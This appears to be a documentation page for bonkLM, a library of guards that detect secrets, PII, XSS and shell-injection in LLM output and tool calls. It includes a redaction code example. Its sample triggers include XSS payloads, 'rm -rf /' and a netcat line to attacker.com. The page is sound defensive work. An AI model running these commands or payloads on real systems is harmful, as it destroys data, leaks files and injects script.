bonkLM
Docs

Guards

Guards inspect outbound content and tool-call arguments. They focus on data exposure (secrets, PII) and execution safety (XSS, bash). Pair them with validators for full-loop coverage.

Catalogue

SecretGuardvalidateSecrets()

Flags 36 types of leaked credentials in any string: API keys, AWS keys, GitHub tokens, JWT, OpenAI keys, Stripe keys, private SSH/PGP keys, and more.

Trips on
  • sk-proj-abc123def456…
  • aws_access_key_id=AKIAIOSFODNN7EXAMPLE
PIIGuardredactPIIInStringSync()

Detects and redacts 30+ PII patterns — US SSN, IBAN, NHS number, Dutch BSN, German Tax ID, Spanish DNI/NIE, Portuguese NIF, Polish PESEL, Swedish Personnummer, plus phones, emails, credit cards (Luhn-validated).

Trips on
  • john.doe@example.com
  • 123-45-6789
  • 4111-1111-1111-1111
XSSGuardcheckXSS()

Strips reflected XSS payloads — <script>, on*= handlers, javascript: URIs, SVG/MathML smuggling, and DOM-clobbering patterns.

Trips on
  • <img src=x onerror=alert(1)>
  • <svg><script>alert(1)</script></svg>
BashSafetyGuardcheckBashSafety()

Catches command-injection patterns in shell tool calls — destructive `rm -rf`, directory escape via `../`, SQL injection in shell-wrapped queries, and dangerous chains via `;`, `&&`, `||`, backticks.

Trips on
  • rm -rf /
  • cat file.txt; nc attacker.com 4444

Redaction example

PII and secret guards default to detect. To redact, call the sync redactor directly or set action: 'sanitize' on the engine.

import { redactPIIInStringSync } from '@blackunicorn/bonklm'

const safe = redactPIIInStringSync('Email me at jane@example.com about SSN 123-45-6789')
// → 'Email me at [REDACTED:email] about SSN [REDACTED:ssn]'